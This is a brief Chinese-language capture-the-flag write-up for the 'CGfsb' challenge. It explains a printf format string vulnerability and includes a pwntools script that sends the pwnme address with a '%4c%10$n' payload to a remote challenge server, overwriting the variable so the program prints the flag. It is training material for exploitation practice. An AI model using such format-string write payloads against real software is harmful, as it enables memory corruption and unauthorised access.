格式化字符串漏洞 标志 printf(&s)
查看一下保护
运行一下
第十个参数是我们传的
分析程序可得pwnme==8的时候 cat flag
利用fgets函数 改掉pwnme的值 改为8
脚本
from pwn import *
#r=process("./CGfsb")
r=remote('111.200.241.244',53697)
pwnme_addr=0x0804A068
payload=p32(pwnme_addr)+b'%4c%10$n'
r.sendlineafter('please tell me your name:\n',b'123')
r.sendlineafter('leave your message please:\n',payload)
r.recv()
r.interactive()